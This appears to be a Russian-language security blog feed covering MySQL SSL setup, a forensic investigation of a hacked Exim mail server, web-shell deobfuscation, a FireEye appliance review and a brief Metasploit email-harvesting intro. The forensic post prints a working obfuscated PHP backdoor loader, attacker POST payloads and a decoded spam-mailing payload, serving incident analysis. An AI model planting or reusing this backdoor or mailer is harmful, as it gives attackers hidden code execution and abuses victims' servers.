Установка поддержки SSL на MySQL
cert_ua


Есть несколько разных способов установки MySQL с SSL, но иногда сложно её закончить, из-за того что все эти источники не достаточно качественны и просты. Обычно, установка MySQL+SSL не так проста из-за весьма непрозрачных факторов типа “сегодня не мой день”, что-то не взлетит либо врёт документация:) Я дам инструкции по установке MySQL с SSL, репликации SSL и установлению скьюрного коннекта из консоли и скриптами покажу что всё работает.

1. Генерирую SSL-сертификат в соответствии с примером . Использую разные имена для Use клиентского и серверного сертификатов.

2. Для ясности, сохраню сгенерированные файлы сертификатов сюда - /etc/mysql-ssl/

3. Добавлю следующее в /etc/my.cnf в секцию [mysqld]:

# SSL
ssl-ca=/etc/mysql-ssl/ca-cert.pem
ssl-cert=/etc/mysql-ssl/server-cert.pem
ssl-key=/etc/mysql-ssl/server-key.pem

4. Рестартую MySQL.

5. Создаю юзера для разрешения ему только SSL-encrypted коннектов:



GRANT ALL PRIVILEGES ON *.* TO ‘ssluser’@’%’ IDENTIFIED BY ‘pass’ REQUIRE SSL;


Установка секьюрного коннекта из консоли

1. Если клинет на другом ноде, копирую /etc/mysql-ssl c другого сервера на этот.

2. Добавлю следующее в /etc/my.cnf в секцию [client]:

# SSL
ssl-cert=/etc/mysql-ssl/client-cert.pem
ssl-key=/etc/mysql-ssl/client-key.pem

3. Тестирую секьюр коннект:



[root@тазик ~]# mysql -u ssluser -p -sss -e ‘\s’ | grep SSL
SSL: Cipher in use is DHE-RSA-AES256-SHA


Устанавливаю репликацию SSL

1. Установлю скьюрный коннект из консоли к слейву (Slave) как описано выше, для того чтобы удостовериться что SSL работает.

2. На мастере (Master) добавлю “REQUIRE SSL” для репликации изера:



GRANT REPLICATION SLAVE ON *.* to ‘repl’@’%’ REQUIRE SSL;


3. Меняю опции мастера и рестартую слейва:



STOP SLAVE;
CHANGE MASTER MASTER_SSL=1,
MASTER_SSL_CA=’/etc/mysql-ssl/ca-cert.pem’,
MASTER_SSL_CERT=’/etc/mysql-ssl/client-cert.pem’,
MASTER_SSL_KEY=’/etc/mysql-ssl/client-key.pem’;

SHOW SLAVE STATUSG
START SLAVE;
SHOW SLAVE STATUSG


Установка секьюрного коннекта из PHP

1. Устанавливаюl пакеты php и php-mysql. Я использовал версию >=5.3.3 (в других случаях может не работать).

2. Создаю скрипт:



[root@тазик ~]# cat mysqli-ssl.php
$conn=mysqli_init();
mysqli_ssl_set($conn, ‘/etc/mysql-ssl/client-key.pem’, ‘/etc/mysql-ssl/client-cert.pem’, NULL, NULL, NULL);
if (!mysqli_real_connect($conn, ’127.0.0.1′, ‘ssluser’, ‘pass’)) { die(); }
$res = mysqli_query($conn, ‘SHOW STATUS like “Ssl_cipher”‘);
print_r(mysqli_fetch_row($res));
mysqli_close($conn);


3. Тестирую:



[root@тазик ~]# php mysqli-ssl.php
Array
(
[0] => Ssl_cipher
[1] => DHE-RSA-AES256-SHA
)


Установка секьюрного коннекта из Python

1. Устанавливаю пакет MySQL-python.

2. Создаю скрипт:



[root@тазик ~]# cat mysql-ssl.py
#!/usr/bin/env python
import MySQLdb
ssl = {‘cert’: ‘/etc/mysql-ssl/client-cert.pem’, ‘key’: ‘/etc/mysql-ssl/client-key.pem’}
conn = MySQLdb.connect(host=’127.0.0.1′, user=’ssluser’, passwd=’pass’, ssl=ssl)
cursor = conn.cursor()
cursor.execute(‘SHOW STATUS like “Ssl_cipher”‘)
print cursor.fetchone()


3. Тестирую:



[root@тазик ~]# python mysql-ssl.py
(‘Ssl_cipher’, ‘DHE-RSA-AES256-SHA’)


Примечания

Альтернативный сетап локального коннекта по SSL
Если Вы коннектитесь к серверу локально с включенным SSL, можно так же устанавливать секьюрные соединения так::
1. Создаём ca.pem:



cd /etc/mysql-ssl/
cat server-cert.pem client-cert.pem > ca.pem


2. Имеем только следующие строки по ssl- в /etc/my.cnf в секции [client]:

# SSL
ssl-ca=/etc/mysql-ssl/ca.pem

Error “ssl-ca” при локальных коннектах
Если Вы оставили строку “ssl-ca=/etc/mysql-ssl/ca-cert.pem” в разделе [client] файла /etc/my.cnf сервера, чтобы включить SSL и при этом пытаетесь установить локальное подключение через SSL, получите “ERROR 2026 (HY000): SSL connection error: error:00000001:lib(0):func(0):reason(1)”.

Описание в документации
http://dev.mysql.com/doc/refman/5.5/en/using-ssl-connections.html гласит “A client can connect securely like this: shell> mysql –ssl-ca=ca-cert.pem” which does not work with “REQUIRE SSL”. Тоесть, либо поддерживаетя клиентский сертификат и ключ для всех. либо комбинированный сертификат client+server для локального секеьюрного коннекта.

Tags: ,

[пример] Исследование взлома почтового сервера
cert_ua
посвящается админам, у которых взломали почтовик)


Имеем:

Логов нет, знаем что почтовик на экзиме 2 дня назад начал дико слать почту в мир.
Самая старая энтри экзима - 2014-03-18 00:37:59. Значит трабл был раньше.
Ставим софт для форенсики и узнаём больше:






apt-get install tct sleuthkit
fls -r -m / /dev/xvda2 > xvda2.dump
mactime-sleuthkit -b xvda2.dump -p /etc/passwd 2014-01-01 > xvda2.dump.mac






Анализ временых меток сервера даёт инфу, что два дня назад, внезапно тёмной ноченькой 2014-03-18, было удалено много файлов и
были некоторые ошибки типа "нет места на диске". админ подумал, что мало места и не обратил внимания,
решив почистить сервер когда придёт утро. Админ почистил некоторые логи и освободил место на следующее утро.

В /var/spool/exim4/input/ нахожу в очереди письма (спам), висящие в спуле и отправляемые с адреса
www-data@hostname. Самое старое из них датируется 2014-03-14 22:16. Тоесть трабл случился до 2014-03-18.
В спуле экзима 250 килописем...ой. Чищу очередь (удаляю этот спам/нужную почту, освободжаю дисковое пространство):







exim4 -bp|grep -o "1W[[:alnum:]-]*"|xargs -n 1 exim4 -Mrm






Пострадавшая сторона не в восторге.

Очередь остаётся, значит малварь ещё работает. Он работает под юзером www-data (из-под апача). Останавливаю экзим и апач.
С помошью mactime timeline определяю 2 повреждённых файла:







2014-03-05 12:35 /var/www/.../spip/tmp/cache/skel/html____php_eval_base64_decode___POST_evv________php___d3135576b1e1eae4241edc0e24a2b047.php
2014-03-06 14:50 /var/www/.../spip/ecrire/lang/hsys.php






Экзим показал, что за 24 часа было отослано овердофига (20 килописем) и...






hsys.php

Похоже - малварь.
Сохраняю копию и стартую экзим, предварительно открыв просмотр логов почты и очередь.
стартую апач, предварительно сконфигурировав некоторое логирование того, что он делает (он нифига никуда не писал!!).

hsys.php содержит закриптованый payload, который я не могу раздекриптить без пароля, передаваемого ему через метод POST или с помощью cookie.

Задумался о некотором криптоанализе, но плейнтекст на который я смотрел за gzip'лен.
Вот как этот код выглядит, с обрезаным пейлоадом и небольшим обрамлением:

<?php $wp__wp='base'.(32*2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'P7NA4RFrFxj ..... ZCbTBLY='));
$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);
if($wp_wp!==NULL){
 $wp_wp=md5($wp_wp).substr(md5(strrev($wp_wp)),0,strlen($wp_wp));
 for($wp___wp=0;$wp___wp<15185;$wp___wp++){
  $wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);
  $wp_wp.=$wp__wp[$wp___wp];
 }
 if($wp__wp=@gzinflate($wp__wp)){
  if(isset($_POST['wp_wp']))@setcookie('wp_wp', $_POST['wp_wp']);
  $wp___wp=create_function('',$wp__wp);
  unset($wp__wp,$wp_wp);
  $wp___wp();
 }
}?>




Когда смотрю логи, я вижу повторяющиеся попытки доступа к hsys.php. Неплохо бы узнать пароль, поэтому я создал новый hsys.php.
 





<?php 
$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);
if($wp_wp!==NULL){
  $myFile = "/tmp/hsys.log";
  $fh = fopen($myFile, 'a');
  fwrite($fh, $wp_wp);
  fwrite($fh, '\n');
  fclose($fh);
}
?>





Через парусекунд я получил пассворд. Он нецензурен и русскоязычен.
Айпишки, которые хотят коннекта с hsys.php, по геоайпи - тоже русские:







cat /var/log/apache2/error.log |grep -o "188.143[.0-9]*"|sort|uniq
188.143.232.147
188.143.232.189
188.143.232.30
188.143.232.45
188.143.233.136











геоайпи:






188.143.232.147 RU Saint-Petersburg, Petersburg Internet Network LLC
188.143.233.136 RU Moscow, Petersburg Internet Network LLC






с пассвордом я декриптую пейлоад, просто задав значение $wp_wp:


$wp_wp="hu...da";
if($wp_wp!==NULL){
 $wp_wp=md5($wp_wp).substr(md5(strrev($wp_wp)),0,strlen($wp_wp));
 for($wp___wp=0;$wp___wp<15185;$wp___wp++){
  $wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);
  $wp_wp.=$wp__wp[$wp___wp];
 }
 if($wp__wp=@gzinflate($wp__wp)) print $wp__wp;



Это возвращает пейлоад, который может быть инкапсулирован как нечто похожее на:




<?php 
function foo () {
  ...payload...
}
foo();
?>



Пейлоад выглядит как веб-шелл, который я нахожу, гугля похожие/характерные строки врапперов в рунете.
Беру сохранённую копию и открываю её в браузере. Это даёт симпотный шелл с возможностями:

  • command line execution

  • php code execution

  • file browser

  • SQL client

  • pwd brute-force

  • reverse shell

  • и т.д.

Шелл имеет метку P.A.S. v.3.0.10
гуглю сие - http://profexer.name/pas/download.php, где любой может взять себе свою версию его же заинкрипченым.
Введя пасс, я вошёл и получил некоторый ПХП-код с таким же заинкрипченым кодом пейлоада (тоесть я получил пасс того, кто был передо мной тут же).
Этот сайт принадлежит русским, как я выяснил ранее.

Далее, я хочу выяснить какие инструкции посылались веб-шеллу ботами, которые долбили в закрытую дверь моего похаканого сервера почты.
Для этого я недолго восстанавливаю оригинал того, как я регистрирую запросы POST

$myFile = "/tmp/hsys-post.log";
$fh = fopen($myFile, 'a');
fwrite($fh, print_r($_POST, true));
fwrite($fh, '\n');
fclose($fh);




Потом я стопаю экзим, апач, чищу очередь экзима, удаляю скрипт и стартую его опять.
Логфайл фиксирует много пейлоадов, приходящих ко мне:
Array






(
    [sc] => 
    [wp_wp] => hu...oda
    [pass] => hu...oda
    [ev] => eval(base64_decode(rawurldecode("ZWNo...OHEnOw==")));
    [php] => eval(base64_decode(rawurldecode("ZWNo...OHEnOw==")));
    [nst_cmd] => goto
    [act] => eval
    [eval] => eval(base64_decode(rawurldecode("ZWNo...OHEnOw==")));
    [eval_txt] => 1
    [nst_tmp] => tools
    [php_ev_c] => eval(base64_decode(rawurldecode("ZWNo...OHEnOw==")));
    [cmd] => 
    [php_eval] => eval(base64_decode(rawurldecode("ZWNo...OHEnOw==")));
    [a] => Php
    [p1] => eval(base64_decode(rawurldecode("ZWNo...OHEnOw==")));
)











похоже на брутфорс всех путей, которые могут исполнять ПХП-код ))
Пейлоад выглядит так - http://www.unphp.net/decode/e3fc3548b7c14a8548b24c8b82544dea/
Как пользоваться этим сайтом я объснил тут.
Красата:




<?php echo 'l0978q';
error_reporting(0);
ini_set("mail.add_x_header", "0");
$_SERVER["SCRIPT_URL"] = "http://" . $_SERVER["HTTP_HOST"] . "/index.php";
$_SERVER["SCRIPT_URI"] = "http://" . $_SERVER["HTTP_HOST"] . "/index.php";
$_SERVER["REMOTE_ADDR"] = "192.168.0.1";
$_SERVER["HTTP_REFERER"] = "";
$_SERVER["SCRIPT_FILENAME"] = "";
$_SERVER["PHP_SELF"] = "/index.php";
$_SERVER["REQUEST_URI"] = "/index.php";
$_SERVER["SCRIPT_NAME"] = "/index.php";
echo mail("#REDACTED#@gmail.com
/* {C}{C}{C}{C}(function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
", "Get your   drugs iin nooo time  thaaannnks ttto quick shipping", "BBuy thhe best qqualiity geeeneric andd nmee brnnds onlne with worldwwwidee  shippping.
 
http://thenmozhi.org/oldfiles/backup/uw8ck.php", "From: wpsbhy@" . $_SERVER['SERVER_NAME'] . "
" . "Reply-To: wpsbhy@" . $_SERVER['SERVER_NAME']);
echo 'l0978q';



интересно увидеть, как код пытается перезаписать переменные  $_SERVER, наверно чтобы скрыть себя от логов и я бы не узал работает он или нет...

Остаётся только типичный спам, с некоторым интересным  javascript после почтового адреса (и без тела).
Да, надо разбанить сервер почты во всех блеклистах, в которые он попал за 2 суток...

с админа сервера ПИВО)

Деобфускация шеллов
cert_ua
Вы админ сайта или занимаетесь IT-безопасностью?
Бывает так, что Ваш подопечный веб-ресурс взломали и Вы нашли там залитый шелл.
Как правило, он шелл обфусцирован и Вы просто удаляете его с сервера.
Если надо разобраться КАК это произошло и что за уязвимость была экплуатирована - неплохо бы понять что за шелл Вам залил хакер.
Это можно сделать многими способами, из которых я покажу 2:

1. Веб-сайты по деобфускации:

Это менее хардкорный сервис as-is "для лентяев" - сайт www.unphp.net. Там есть простое окошко, куда Вы вводите свою "ХРЕНЬ" и получаете готовый и более удобочитаемый скрипт.


1
Проверим как это работает.
Я нашёл шелл на сайте друпала (конечно я сказал им об этом):
1
 скопировал этот текст в буфер обмена и просто вставил в окно www.unphp.net. Результат ниже:

1
1

На этом же сайте есть возможность посмотреть недавно загруженніе другими желлы и результаты их обработки. Лично мне подумалось (я ел двойную печеньку с доброй стороны), что можно сделать софт, который апдейтит свою базу известных шеллов и их деобфусцированных версий, просто парся эту страничку:

1
...а потом, этот мой софт мог бы искать залитые шаллы в некоторых доменах за небольшие деньги, всегда оставаясь актуальным (пока есть доступ в Интернет и владельцы сайта не переделали свой дизайн)...

...а злая сторона печеньки подсказывает, что можно сделать систему мониторинга того, что Ваш шелл спалили и перевыпускать новые модификации шелла как только они засветились на этом и подобных сайтах...хе-хе


2. В *nix-системах с помощью командной строки:

Об этом написано тут. Проверил, работает, пользуюсь.

Как я тестировал оборудование Fire Eye
cert_ua
  Недавно посчастливилось опробовать новое и только приехавшее в Украину оборудование защиты корпоративных решений от фирмы FireEye. Это оборудование предназначено для защиты от APT и эффективного расследования инцидентов информационной безопасности.

  Мне были предоставлены три комплекта - 7400 NX, 7400 CMS и 7400 EX. Они только появились на территории Украины, производятся в США. Форм-фактор - 2-юнитный сервер, прикольная на вид железного цвета панель, глубина сервера - полная.
Итак, по очереди расскажу о каждой.

1. 7400 NX - средство обеспечения защиты от APT для корпоративных сетей среднего масштаба от веб-based атак.

3
Если сухо с прайса магазина, то ТТХ примерно такие:

7

Базовая установка проходит путём захода через консольный порт RS-232 (кабеля в поставке не обнаружилось, но я находчив!) и ввода магических строк для запуска мастера начальной установки (он сбрасывает предыдущую настройку):

fireeye > enable
fireeye # configure terminal
fireeye (config) # configuration jump-start

Там я ответил на 15 относительно простых вопросов об адресах административного интерфейса, шлюза сети,
доменного сервера (я указал 8.8.8.8 и заработало), ключах лицензий и обновлений (у меня их
небыло и я пропустил этот шаг, нажав ввод и выбрав Evaluation license), а так же NTP-сервера (я пропустил этот
шаг и настроил это потом через веб-интерфейс).
После базового мастера я сделал (по привычке, выработаной годами работы с Cisco) команду write mem
и потушил по питанию устройство, отнёс его в серверную (чтоб не шумело и не чувствовало температурный
дискомфорт. Этот дискомфорт при температуре примерно 20 градусов выражается у него в мигании индикатора
"градусника" на передней панели и дикого писка). Смонтировав 7400 NX (я назвал его Ogneglaz), зашёл на него по https как советуется для пущей безопасности:

2

логин\пароль по умолчанию - admin\admin (я не стал их менять при начальной конфигурации)..зачем? мы же тестируем))
  Главное меню находится сверху, подменю - слева.

2

В окошке About мне была показана информация о используемых портах устройства, сервисе DTI (Digital Thread Intelligence), состоянии "железной" составляющей сервера, версии ПО виртуальных операционных систем (на которых всё собственно и тестируется внутри, их у нас тут три - Win XP Sp3, Win 7 x64 Sp1 и Win 7 Sp1), а также версии собственного ПО (которое при заходе в эту опцию само и сразу же попыталось полезть в Интернет и обновиться). На момент начальной установки работали следующие виртуальные операционные системы:

7

Не очень хорошо, что их нельзя менять прямо из графической оболочки. Видимо, это возможно только из командной строки.

Как видно на рисунке, у меня проблемы с лицензией и disabled опция Security content.


4

  Отдельно о  DTI (Digital Thread Intelligence) - это такой облачный сервис по анализу всех собранных образцов вредоносного ПО со всего оборудования Fire Eye по всему миру, в гайдах схематически выглядит это примерно так (у нас - Web MPS):
5
Через это облако, расположенное где-то за океаном, устройства узнают по протоколу https о новых видах угроз, там проводится анализ этого вредоносного ПО и устройства понимают как бороться и как функционируют новые виды вредоносов. Напомню, APT  - это такой вид атак, к которому на начальном этапе неприменим сигнатурный метод (т.к. сигнатур атаки нет на момент проведения атаки), потому 7400 NX, обнаружив зло, тестирует его локально на трёх видах виртуальных машин с виндой, а потом шлёт на анализ в DTI. По неофициальной информации, некоторым странам-заказчикам не доверившим свою информацию для обработки в чужом облаке, сейчас строят своё облако для такого анализа.

Перед проведением любых обновлений и настроек гайд рекомендует мне провести валидацию моих настроек DTI, для этого захожу в Settings: MPC (DTI) Network:

8

Таким образом, есть три+один варианта получения обновлений из облака DTI:
- обновление в рамках начальной (initial) конфигурации;
- периодическое обновление, когда выходят новые релизы апдейтов FireEye. Апдейты выходят когда обновлён профиль безопасности (malware threat profile), выходит новая версия ПО (product release) или патч.

Убеждаюсь, что обновления происходят как положено:

9

Первый вывод - отсутствие лицензий на железку помешает обновлять её знания о новых видах АРТ из облака и сам софт. Тоесть, если Вы не купили новую лицензию на год, то оборудование будет противодействовать только ранее известным видам угроз (а может ли оно реагировать хоть на какие-то угрозы при кончившейся лицензии, не лазя в облако? хм..будем тестировать ведь "такой хоккей нам не нужен", когда нестабильность в стране может запросто привести к непокупке ключика вовремя).

ВРЕЗКА: когда ключи закончились, на почту, которую мы указали как админсткую, исправно пришло ТРИЖДЫ такое вот сообщение:

7
КОНЕЦ ВРЕЗКИ...


Нормальное состояние обновившейся 7400 NX должно быть таким:
9
После обновления лицензий предлагается обновить софт и сигнатуры в окошке about кнопочкой:
9

На этом базовая настройка закончена, переходиим к администрированию.

Настройка будет производиться по схеме, когда трафик клиентов дублируется на порт, который слушает 7400 NX.

Основная политика настраивается на окошке снизу:
1

Вся настройка, которая нам надо - это поставить радиобаттон на "Тар" в верхней табличке. Это переведёт FireEye в режим "только слушаю и сигнализирую" (тоесть не инлайн режим, когда железки стоят в разрезе и могут блокировать нежелательный трафик).

2. Система управления FireEye CMS 7400

Эту врезку в стройный алгоритм тестирования NX'a я сделал для того, чтобы объяснить некоторые щекотливые моменты совместимости управляющей части (CMS) с сенсорами и анализаторами (у нас это ЕХ и NX), а так же логику их взаимодействия.

Как показано на схемке выше,  CMS принимает от ЕХ и NX "сигналы беды" параллельно с самим CMS. Если CMS нашёл беду первым (допустим, это письмо с атачментом в виде вируса), то он раздаёт работу с письмом - ЕХ'у, а с самим вредоносом разбирается NX. Результат работы сенсоров потом возвращается на CMS и дополнительно анализируется.

Такая иерархия взаимодействия логична, но накладывает не совсем понятные ограничения на версии ПО, работающего на всех трёх железках. У нас несостыковка версий NX (тут была версия 7.1) с CMS (тут была версия 6.4) вызвала ошибку добавления в CMS'е NX'а, как устройства мониторинга. Короче, нам пришлось запросить у поставщика оборудования новые ключи (нам их весьма оперативно дали), удалить старые ключи и ввести новые, что дало возможность обновить ПО. Что CMS предлагает обновиться - нам говорит скрин ниже:

8

Выводы:
1. Без ключей железяки не обновляются (это касается лазанья в облако за новыми актуальными данными о новвых видах атак и системного ПО, которое может напряму влиять на работу самих железок и на их совместимость с упрявляющей ими
CMS. Тоесть, например, возможна такая ситуация, когда обновление версии сенсора приведёт к выпадению её из списка (у нас так и случилось). Это заставляет обратить внимание на своевременнную (читай, заблаговременнную) закупку ключей лицензий, а так же на то, что информацию о совместимости версий надо вытаскивать из саппорта клещами  заранее (до собственно обновления).
2. В гугле описания решения проблемы, а так же обсуждения подобных проблем нам найти не удалось. Тоесть, покупая такую железку, надо становиться членом комьюнити и, как минимум, завести соответствующий аккаунт на сайте изготовителя, не забрасывая в далёкий ящик контакт сапорта.

Итак, CMS "увидела" NX:

7

Критическое состояние - потому что ключи подходят к концу срока годности.

3. Подключаем к одному из 4 слушающих (не менеджмент) портов NXа патчкорд, который воткнут в SPAN-порт коммутатора Cisco и в котором бежит копия траффика локальной сети воображаемого клиента. При настройках порта таким образом оборудование FireEye не может посылать свой траффик в него, а только получает траффик.

и...
заработало:

- поднялся порт NX и побежала статистика принятых-отправленных пакетов:
7

...и первым делом я делаю тест оборудования путём встроенного механизма. Я запросил выслать мне все 5 видов образцов "тестового зла":

7

Выпадающее окошко обьяснило, что зло - тестовое и придёт через некоторое время в виде соответствующих файлов/контента. Через несколько часов пришли и были отображены несколько тестов, вот один их них:

7
Как видно, с IANA'овских блоков IP нам прислали тест, иммитирующий callback малваря, ворующего данные юзеров, на хост в "мире".

Но тестирование мы ужесточили и подключили локальную сеть, через 5 минут мы получили интересный результат:

7

Как видно, названия малварей кликабельны и о них можно почитать, получив доступ в облако (напомню, оно в США). Доступ в это облако запросим у поставщика, допишем впечатления...

При клике на маленький красный треугольничек слева открываются детали зафиксированной malitious activity:

7
итак, видно кто заражен, куда отстукивает, как идёт отстук, MAC и IP адреса источника и назначения этого взаимодействия, заголовок GET  HTTP протокола и все поля, версию браузера...тоесть вполне достаточно, чтобы достаточно информативно огорчить админа этой сети, сообщив ему о найденном зараженном компьютере в его сети.

Так же на предыдущем рисунке в графе "Callbacks" виден один отстук. Раскрытие меню даёт возможность ознакомиться с деталями такого отстука (это попытка зараженного компьютера (бота/зомби) связаться с управляющим им сервером), а так же посмотреть/сохранить pcap-файл (сохранённый трафик) этого отстука:

7

Ну и видим, что такой файл с трафиком открывается обычным Wireshark-ом. Это незаменимо для последующего анализа малваря и более детального разбора инцидента.

7

Для того, чтобы понять как работает оборудование в динамике, мы оставили его поработать на ночь. Dashboard за это время должен нарисовать нам первые графики.

4. Прошло некоторое время с момента запуска и тестирования оборудования.  NX выявил несколько вредоносов в сетях:

7

Итого, выявлено 2 АРТ-атаки, скомпрометированы несколько хостов сети и это отображено в виде понятных графиков и диаграмм. При это так же доступна информация о том, какой вирус когда себя обнаруживал для оборудования:

7

Кроме того, есть возможность визуализации и классификации всего проходящего трафика по типам/протоколам (меню справа на всех графиках кликабельны и позволяют показать/скрыть любой вид):

7

Для более детального изучения найденных угроз возможно создание отчётов по атакам, активности малварей и т.д. Для примера создадим несколько отчётов:

7

Чтобы ознакомиться с ними - достаточно стандартных офисных пакетов или даже обычного текстового редактора:

Отчёт по Malware activity и Суммарный отчёт в Вашему вниманию. комментарии излишни. там всё подробно и красиво (на наш взгляд расписано). А вот так выглядит расширенный текстовый отчёт по атакам:

7

Так же имеется весьма гибкая возможность планирования (автоматизации) генерирования отчётов:

7

Можно задать периодичность создания отчётов, тип отчёта и способ его доставки (почта или складировать в виде файла). Для примера мы задали три вида отчётов:

7

Итого, за сутки NX выявил 6 разных видов зловредов в подопытной площадке. Но, согласно настройке, не позволяющей ему активно вмешиваться в трафик клиентов и блокировать их, атаки не блокировались. Скрин CMS показывает найденное в трёх видах как это выглядит со стороны:

- таблица:

7

- графики (мне особо понравилось):

7

- нечто квадратное, позволяющее оценить масштабы и относительность каждого вида угроз (у FireEye это - Treemaps):

7

последний тип визуализации позволяет делать разнвые срезы - по маске подсети, именам зловредов и за разные промежутки времени...вот пример таблицы "какие в сетях с маской \24 за последние 24 часа разные по именам были найдены вирусы":

7

Что же по зараженным хостам? смотрим общую статистику по хостам:

7

клик на название трояна даёт рекомендации из облачного сервиса от производителя:

7

...тоесть сей вид зла специалисты заморские ещё не закончили анализировать и угрозы не очевидны (но они есть!). И потому предлагается патчить браузеры, софт, фаерволлы и IDS'ы. Так же надо не читать атачменты в почте от неизвестных отправителей, не позволять ставить незнакомый софт из неизвестных источников и т.д. и если (вдруг) возникнут вопросы - можно обратиться по соответствующим контактным данным. Особенно забавна фраза про "особо отважных юзеров, которые могут попытаться самостоятельно очистить зараженную систему от зловреда" :)


5. Разграничение полномочий

NX имеет возможности по разграничению полномочий для пользователей. Есть 5 стандартных ролей и я добавил одного нового юзера в роли аналитика...

7

при попытке добавления нового пользователя мне выдало ошибку, которая гласила, что пробел недопустим в имени. Это запустило механизм пентеста в моей голове)) я выяснил, что недопустима так же кириллица, а экранируются все символы, кроме слешей. На введённый мной в поле имени юзера слеш система ответила мне системной ошибкой, которую по моему мнению разработчику лучше было бы убрать (она свидетельствует о раскрытии внутренних путей и плохой "защите от дурака" или фаззинга). Это не критично, скажем, для рядового свича, но кто знает, вдруг - хакер получит удалённый рабочий стол на ПК админа и попытается закинуть свой зловред прямо через GUI NX'а...моё мнение такое - если графический интерфейс есть - он должен скрыть от его пользователя всю системную часть сервера. Ведь именно через выявление недокументированных и плохо фильтруемых параметров команд в IOS ломают, например, Cisco...вот скриншот ошибки:

7

Присутствие поля VLAN намекнуло о мультивлановой сетевухе сервера, но  не проверялось. Если да - то очень хорошо, т.к. это позволяет локализовать домен коллизий, ограничив доступ для каждой учётки ещё и тегом виртуальной локальной сети. Кроме того, можно ограничить доступ по учтной записи так же и по сети с произвольной маской, а так же менять пароли.

6. Уведомления
NX для уведомлений использует некое подобие матрицы, которая весьма гибко позволяет настраивать триггеры при наступлении разных событий:

7

При выборе какого-то чекбокса справа выпадает менюшка для настройки именно этого вида уведомлений (в зависимости от протокола эти менюшки отличаются). Соответственно, в нижней части можно добавлять те серверы, которые будут получать такие уведомления.

Так же имеется возможность получения от системы уведомлений по почте:

7

Уведомления могут быть отфильтрованы по группам (чекбоксы на скрине) для каждого почтового ящика.

Вывод: отчёты и настройка уведомлений достаточно гибкая и понятная. Спамить FireEye не будет, а дежурная смена сможет легко и быстро локализовать проблему.

Для дополнительной защиты и обеспечения безопасной работы с оборудованием по HTTPS есть возможность  подключить сертификаты и ключевые данные:

7
NX поддерживает возможность работы с интсрументарием классификации и идентификации малварей, который называется YARA. Это полезный и мощный инструмент для того, кто хочет провести форенсику. Подробнее о YARA - тут и тут. Его используют такие гиганты, как virustotal, volatility и т.д. В NX есть возможность задать имя файла с шаблоном для разных типов файлов (всего около 30 стандартных расширений):

7

7. 7400 EX - устройство для защиты почтового информационного обмена.

Подключен 7400 EX был аналогично в режиме "только слушаю" к SPAN-порту коммутатора, который принимал траффик почтового тестового почтового домена.

После начальной настройки по аналогии с NX и захода по http выводится стандартное (для всех образцов FireEye это окно почти одинаковое) приглашение к авторизации с выводом настраиваемого устрашения уведомления о том, что мы пытаемся досутпиться на не рядовую железку в сети...нет чтобы иммитировать принтер)):

7

Интересен момент отсутствия средств защиты от подбора аутентификационных данных формы авторизации в сочетании с протоколом HTTP по умолчанию. Ни капчи, ни чего-либо подобного тут нет, тоесть разработчики как бы не ожидают инсайдерских угроз, MITM и т.д. После начального входа под админскими правами я открываю https-сессию:

7

Дефолтный дашборд EX'а выглядит так:

7

он так же гибок и информативен, обображает колличества отсканированных почтовых ссобщений, найденных в общем слушаемом потоке зараженных вирусами потчтовых сообщений, вложений. Сортирует почту по источникам, которых касались алерты и визуализирует эти данные (2 нижних графика пока пусты, ведь мы же только начали тест).

Ключи у нас отсутствовали и через несколько часов ожидания в фильтруемом почтовом трафике первого "опасного" письма мы поняли важны момент:

ЕХ не работает по сути без ключей, пропуская всё подряд!

Это его отличие в худшую сторону от NX'a, который ловит всё, только не обновляет базы при просроченных ключах. Вывод прост - если не собираетесь продлевать ключи - позаботьтесь до окончания ключей об альтернативе EX'у для звщиты от атак по почте.

Далее пробежимся по вкладкам ЕХа:

- алерты могут оборажаться по времени появления, фильтроваться за какой-то промежуток или по встречаемым частям текста (например, можно найти определённый вредонос). По каждому из полей возможна сортировка.

7

- карантин так же может быть отфильтрован по времени, искомому тексту и параметрам писем, в которых он  найден. По каждому из полей возможна сортировка.

7

- окно настроек подобно NX'у, но содержит меню которые уникальны в связи с спецификой ЕХа - работа с почтой:

7

ЕХ имеет матрицу событий немного более узкую, чем его собрат NX, а именно - он информирует только при выявления малваря:

7

Окно настроек агента доставки почты выглядит таким образом:

7

Это окно надо в том случае, если ЕХ настраивается как мейл-релей (тоесть будет принимать почту и передавать её дальше после проверки). У нас не этот случай, так что мы тут оставили всё как есть.

Наконец, наверно, самое важное окно ЕХа - окно настроек фильтрации почты:


7

Тут подтвердилось опасение, что без лицензии атачи не проверяются вообще. Остальное выглядит хорошо и работает. Почту можно дропать 4 разными типами, фантастика.

Окно настроек ассоциаций программ для открытия атачментов к почте разными приложениями - весьма длинное и даёт возможность открыть что угодно чем угодно. Я бы открыл вордовский документ свежезалитым шеллом))...интересно, завопит ли защитный механизм ЕХа при такой попытке (и есть ли такой в природе на виртуальных машинках)?

Кстати, окно виртуальных машин такое же статичное как и в NX, содержит 5 разных образов виндовс-машин. Нет, действие малварей на MAC и Unix-системы не изучается:

7

Окно сертификатов имеет такой вид:

7

Окно отчётов выглядит так:

7

Мы получили новые ключи и ввели их:

7

Как видно из скриншота, каждый ключ активирует определённую "фичу", которых у нас 6. По всей видимости, ЕХ использует для антивирусной проверки движок антивируса Sophos. Оборудование "ожило" после того, как ключи были введены. Это обображено в политиках фильтрации почты:

7

..а так же в окне About, через которое после ввода ключей надо первым делом обновить все компоненты ЕХа:

7

Мы попробовали обновить то, что можно:

7

Tags:

e-mail harvesting with msf
cert_ua
I'll use BackTarck Linux to demostrate (just for fun!) examlpe of e-mail harvesting. This can be done with metasploit tool called search_email_collector.

1. Let's start msf console:
# msfpro

1
i have metasploit pro console that successfully loaded..go on

2. search that console for exploit needed to us by typing:

>search collector

2

we need selected with red color exploit. So let's use it, configure and then execute it

